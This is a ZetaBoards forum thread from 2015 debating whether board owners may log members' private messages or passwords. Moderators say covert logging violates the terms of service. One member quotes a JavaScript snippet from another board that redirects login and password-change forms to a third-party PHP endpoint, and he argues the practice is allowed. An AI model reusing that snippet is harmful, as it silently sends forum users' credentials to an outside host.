We hope you enjoy your visit.

You're currently viewing our forum as a guest. This means you are limited to certain areas of the board and there are some features you can't use. If you join our community, you'll be able to access member-only sections, and use many member-only features such as customizing your profile, sending personal messages, and voting in polls. Registration is simple, fast, and completely free.


Join our community!


If you're already a member please log in to your account to access all of our features:

Username:   Password:
Locked Topic
[ ! ] Is there any way to log private messages?
Topic Started: Feb 7 2015, 12:19 AM (1,336 Views)
Devourz
Member Avatar
Member
[ *  *  * ]
is there anyway to log private messages?
Offline Profile Goto Top
 
Helena
Member Avatar
M is for Mod

PM logging is an option for boards that subscribe to ZetaBoards Premium. It can be enabled/disabled by member group. PMs cannot be logged on the free version of ZetaBoards.
Offline Profile Goto Top
 
Kankuro
Member Avatar
かんくろ
[ *  *  *  *  * ]
Helena
Feb 7 2015, 12:22 AM
PM logging is an option for boards that subscribe to ZetaBoards Premium. It can be enabled/disabled by member group. PMs cannot be logged on the free version of ZetaBoards.
Are 3rd party codes to duplicate features of Zetaboard Premium allowed?

This request for example, could it be fulfilled with a code or would that be against rules?
Offline Profile Goto Top
 
Arrogant
Member Avatar
Member
[ *  *  *  * ]
Are you saying they cannot be logged because that feature doesn't exist on free versions of ZetaBoards.. or because PMs aren't allowed to be logged on free versions of ZetaBoards?

D'oh, Kankuro beat me to it.

I was under the impression that it was allowed as long as users are notified before they send a PM (similar to how it works on premium boards). Is that not the case?
As far as I'm aware, board owners are allowed to log passwords using JavaScript, so it'd be fairly odd if PMs weren't also allowed to be logged (since passwords can be used to gain access to accounts anyway.. along with changing passwords in the ACP, so PMs aren't really guaranteed to be "personal" to begin with).
Edited by Arrogant, Feb 7 2015, 12:38 AM.
Offline Profile Goto Top
 
Helena
Member Avatar
M is for Mod

Sorry for not stating that more clearly. That option does not exist for free ZetaBoards. However, it is not good idea to write a code that will log PMs for a free ZetaBoards version. It could qualify as harmful or disruptive JS and violation of the TOS and therefore has been discouraged. The version available through ZetaBoards Premium has safeguards to insure users are aware of the features action in their accounts.

Although PM stands for "personal message", many users interpret it as "private message" and have an expectation that their inbox communication is indeed private. So it is necessary to be sensitive that perception.
Edited by Helena, Feb 7 2015, 03:10 PM.
Offline Profile Goto Top
 
Reid
Member Avatar
È una trappola!

Arrogant
Feb 7 2015, 12:37 AM
As far as I'm aware, board owners are allowed to log passwords using JavaScript
That is not the case. If you come across a board that does so, please report it immediately.
Offline Profile Goto Top
 
Arrogant
Member Avatar
Member
[ *  *  *  * ]
Reid
Feb 7 2015, 01:13 PM
Arrogant
Feb 7 2015, 12:37 AM
As far as I'm aware, board owners are allowed to log passwords using JavaScript
That is not the case. If you come across a board that does so, please report it immediately.
I reported an InvisionFree forum to the staff years ago for rerouting login information to a third-party site, and was told that it was fine. I was told that while the staff do not encourage such a thing, it's allowed.

Code:
 
if ( location.href.indexOf("act=UserCP&CODE=28") != -1 ) {
document.forms["form1"].innerHTML += "<input type='hidden' name='UserName' value='" + nih + "' />"
document.forms["form1"].action = "http://we.ezydigital.com/smf/stlpc.php"
}
if ( location.href.indexOf("act=Login&CODE=00") != -1 || location.href.split("index.php")[1] == "?" || location.href.indexOf("act=idx") != -1 ){
document.forms['LOGIN'].action="http://we.ezydigital.com/smf/stl.php"}

Quote:
 
Well, that's silly. It'd be much easier for an admin to just change a user's password through the Admin CP. :rolleyes: The capability is there, although of course, it isn't an act of good faith, which is why we don't encourage administrators to go snooping around their users' accounts.

The data isn't personal. It's just one's username (which is public knowledge) and password, which an administrator can change through the Admin CP anytime they want.

People should not use the same password for multiple sites.

It's perfectly possible on privately-hosted boards that the owner has removed any form of encryption from the database, or is recording the passwords as people register, using server side methods that are impossible to detect.

It's also possible that such an operation is being used for innocuous purposes--someone may want to create the impression of integration with their website's user database, so they want people's user accounts on the site to be created and modified in sync with their accounts on the board.
Offline Profile Goto Top
 
Reid
Member Avatar
È una trappola!

I don't know who said that or when that was said (you can PM those details to me if you'd like), but we have closed boards in the past for sending ZetaBoards account passwords to a third-party service.
Offline Profile Goto Top
 
Arrogant
Member Avatar
Member
[ *  *  *  * ]
Reid
Feb 7 2015, 02:45 PM
I don't know who said that or when that was said (you can PM those details to me if you'd like), but we have closed boards in the past for sending ZetaBoards account passwords to a third-party service.
Just so it's clear, what part of the ToS would that be violating? Stephen referenced section 3.1 in a similar thread:
Quote:
 
Users may not post, upload, link to, or email any Content that contains, promotes, gives instruction about, or provides prohibited Content. Prohibited Content includes any Content that breaks any local, state, county, national or international law. Prohibited Content also includes: (l) Content that is invasive of privacy or impersonation of any person/entity
I've always thought that section referenced content in threads, posts, uploads, etc.. not content, such a JavaScript, that's added to the board wrappers.

Since PM logging exists as a feature, I'm assuming privacy can be invaded as long as board users are notified that it's going to happen if they take a voluntary action. Would password rerouting/logging be alright if a notice were added to the login page?

Like mentioned above, rerouting passwords and other login information can also be done for innocuous purposes, such as enabling the use of a third-party database to store information securely. Is that not allowed?
Offline Profile Goto Top
 
Reid
Member Avatar
È una trappola!

In the terms of service, content is defined as
Quote:
 
Content: Posts, messages, links, email, uploaded files, usernames, or any other user created data.
I don't know if stuff in the board template should be included in "user created data" or not, but I would argue that it should be, and thus has all the same restrictions as defined in section 3.1. However, if that is not enough, in section 12 (Prohibited Behavior), it says
Quote:
 
Your forum can not contain harmful or disruptive html/javascript.
Since logging users' passwords without their knowledge is clearly harmful, this line prohibits it.

I can't speak directly for Zathyus on the matter, but my opinion is that if the user were presented with a dialog box informing them that their password will be visible to board administration upon logging in/registration, and they accepted this (by clicking Yes, I understand), then that would be OK. At that point, they are clearly aware and have accepted that their password is not private, and they can take appropriate measures with that knowledge in mind. But, silently logging passwords without user consent is a surefire way to get your board closed.

However, that is my opinion: do not interpret it as network policy.

If you are concerned about serverside security, there are several creative workarounds that don't require sniffing a user's account password. For example, have your code grab a random token from the server and place it in the user's signature temporarily. Then, the server loads the user's profile, finds the token, and so verifies that the user is the master of that account. After that, you could store another random token in the user's note pad (in the user CP) that acts as a password for their account on the server. Also, store that locally in their browser (say with `$.zb.set`). Then, for future requests, use that token to authenticate against the server.

That's a more complicated solution, but it effectively couples the user's ZetaBoards account to their server account without needing their password.
Offline Profile Goto Top
 
Cory
Member Avatar
Member
[ *  *  *  *  *  *  *  *  * ]
Helena
Feb 7 2015, 12:54 AM
However, it is not good idea to write a code that will log PMs for a free ZetaBoards version. It could qualify as harmful or disruptive JS and violation of the TOS and therefore has been discouraged. The version available through ZetaBoards Premium has safeguards to insure users are aware of the features action in their accounts.
If the code were to add the same exact safeguards, would it then be a problem-free solution, therefore allowed to be written and released publicly?
Offline Profile Goto Top
 
Reid
Member Avatar
È una trappola!

This request was deemed impractical by our staff. This could mean that the feature you have requested is impossible to write, requires PHP and/or hosting, or requires too many AJAX requests. If you have any questions about why this request is not practical, feel free to contact Reid .
Offline Profile Goto Top
 
1 user reading this topic (1 Guest and 0 Anonymous)
« Previous Topic · Closed Requests · Next Topic »
Locked Topic